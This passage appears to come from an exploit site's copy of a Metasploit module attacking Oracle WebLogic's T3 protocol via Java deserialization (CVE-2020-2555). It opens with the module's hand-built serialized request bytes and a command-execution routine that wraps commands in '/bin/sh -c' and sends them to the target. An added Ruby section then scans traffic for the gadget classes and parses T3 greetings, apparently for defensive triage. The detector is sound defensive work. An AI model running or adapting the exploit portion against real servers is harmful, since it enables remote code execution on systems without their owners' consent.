request_obj << '73'
request_obj << 'a53caff10000000700'
request_obj << '001b59'
request_obj << 'ffffffffffffffffffff'
request_obj << 'ffffffffffffffffffff'
request_obj << 'ffffffff'
request_obj << '0078'
request_obj << 'fe010000' # separator
request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
request_obj << '0013' # Class name length: 19
request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
request_obj << '6a766d2e4a564d4944'
request_obj << 'dc49c23ede121e2a' # SerialVersionUID
request_obj << '0c0000' # flags: SC_BLOCK_DATA | SC_EXTERNALIZABLE, no fields
request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
request_obj << '1d0181401281'
request_obj << '34bf427600093132372e'
request_obj << '302e312e31a53caff1'
request_obj << '000000000078'
new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
request_obj[0, 8] = new_len
sock.put([request_obj].pack('H*'))
sleep(1)
end
def format_payload(payload_cmd)
print_status('Formatting payload...')
payload_arr = payload_cmd.split(' ', 3)
formatted_payload = ''
payload_arr.each do |part|
formatted_payload << '74' # denotes a string
formatted_payload << part.length.to_s(16).rjust(4, '0')
formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
end
formatted_payload
end
def execute_command(cmd, _opts = {})
cmd.prepend('/bin/sh -c ')
cmd = build_payload_obj(cmd)
t3_send(cmd)
end
end
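The hex the module assembles is a hand-built Java serialization stream, and the comments beside each fragment (TC_CLASSDESC, class name, SerialVersionUID, flags, field count) are exactly the structure a defender watching T3 traffic on port 7001 can key on. The Ruby below is an added example and is not part of the module above or of Metasploit: it locates TC_CLASSDESC records in raw bytes using that layout, reports the class names the payload relies on (taken from the module's own comments), and parses the T3 greeting the module sends in `t3_handshake`. The sample inputs are constructed by concatenating the module's own hex fragments and do not form a complete, valid stream; the SC_* flag mask and the 64-field sanity cap are this scanner's assumptions, chosen to keep false positives down on arbitrary binary data.

```ruby
# frozen_string_literal: true

# Added example (not part of the Metasploit module): heuristic scanner for
# Java serialization class descriptors plus a T3 handshake parser.
# Descriptor layout per the Java Object Serialization Stream Protocol:
#   0x72 | UTF(class name) | serialVersionUID (8) | flags (1) | field count (2)

STREAM_MAGIC = "\xAC\xED\x00\x05".b
TC_CLASSDESC = "\x72".b
# SC_WRITE_METHOD (0x01) | SC_SERIALIZABLE (0x02) | SC_EXTERNALIZABLE (0x04) | SC_BLOCK_DATA (0x08)
VALID_FLAG_MASK = 0x0f
CLASS_NAME_RE = /\A\[*[A-Za-z_$][\w$.\/;]*\z/

# Class names from the payload the module builds; a T3 request carrying a
# descriptor for one of these is a strong indicator of a CVE-2020-2555 attempt.
GADGET_CLASSES = %w[
  javax.management.BadAttributeValueExpException
  com.tangosol.util.filter.LimitFilter
  com.tangosol.util.extractor.ChainedExtractor
  com.tangosol.util.extractor.ReflectionExtractor
].freeze

ClassDesc = Struct.new(:offset, :name, :suid, :flags, :field_count)

def hex_to_bytes(hex)
  [hex.delete(" \n")].pack('H*')
end

def serialized_stream?(data)
  data.b.start_with?(STREAM_MAGIC)
end

# Return a ClassDesc for every byte run shaped like a class descriptor: sane
# name length, Java-style name, flags inside the SC_* mask, modest field count.
# A matched descriptor is skipped whole so 0x72 ('r') bytes inside names and
# UIDs are not re-examined.
def scan_class_descs(data)
  data = data.b
  found = []
  i = 0
  while (i = data.index(TC_CLASSDESC, i))
    len = data[i + 1, 2]&.unpack1('n')
    if len && len.between?(1, 255)
      name = data[i + 3, len]
      rest = data[i + 3 + len, 11] # serialVersionUID(8) + flags(1) + field count(2)
      if name && name.bytesize == len && rest && rest.bytesize == 11 && name.match?(CLASS_NAME_RE)
        suid, flags, fields = rest.unpack('Q>Cn')
        if (flags & ~VALID_FLAG_MASK).zero? && fields <= 64
          found << ClassDesc.new(i, name.force_encoding(Encoding::UTF_8), suid, flags, fields)
          i += 3 + len + 11
          next
        end
      end
    end
    i += 1
  end
  found
end

def gadget_classes_in(data)
  scan_class_descs(data).map(&:name).select { |n| GADGET_CLASSES.include?(n) }.uniq
end

# The module's handshake decodes to "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n".
# Returns nil unless +data+ opens with a T3 greeting, else version and headers.
def parse_t3_handshake(data)
  text = data.dup.force_encoding(Encoding::UTF_8)
  return nil unless text.valid_encoding? && text.start_with?('t3 ')
  lines = text.split("\n")
  version = lines.first.sub(/\At3 /, '')
  headers = lines.drop(1).select { |l| l.include?(':') }.map { |l| l.split(':', 2) }.to_h
  { version: version, headers: headers }
end

# Constructed sample: the module's hex for the BadAttributeValueExpException,
# Exception and Throwable descriptors, then the LimitFilter descriptor. Not a
# complete valid stream, only enough to exercise the scanner.
SAMPLE_STREAM = hex_to_bytes(<<~HEX)
  aced0005
  7372 002e 6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6e
  d4e7daab632d4640 020001 4c0003 76616c 740012 4c6a6176612f6c616e672f4f626a6563743b
  7872 0013 6a6176612e6c616e672e457863657074696f6e d0fd1f3e1a3b1cc4 020000
  7872 0013 6a6176612e6c616e672e5468726f7761626c65 d5c635273977b8cb 030004
  7372 0024 636f6d2e74616e676f736f6c2e7574696c2e66696c7465722e4c696d697446696c746572 954e4590be89865f 020006
HEX

# The module's own handshake bytes (t3_handshake), constructed here as input.
SAMPLE_HANDSHAKE = hex_to_bytes('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')

if $PROGRAM_NAME == __FILE__
  scan_class_descs(SAMPLE_STREAM).each do |d|
    printf("%5d  %-50s suid=%016x flags=%02x fields=%d\n", d.offset, d.name, d.suid, d.flags, d.field_count)
  end
  puts "gadget classes: #{gadget_classes_in(SAMPLE_STREAM).inspect}"
  p parse_t3_handshake(SAMPLE_HANDSHAKE)
end
```

Run it directly to see the four descriptors with their offsets and UIDs, then the two gadget-chain names and the parsed greeting. Fed with the bytes following the `fe010000` separators of a captured T3 request, the same functions give a quick triage answer (is this a serialized stream, and does it carry Coherence gadget classes?) without deserializing anything.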
Copyright ©2024 Exploitalert.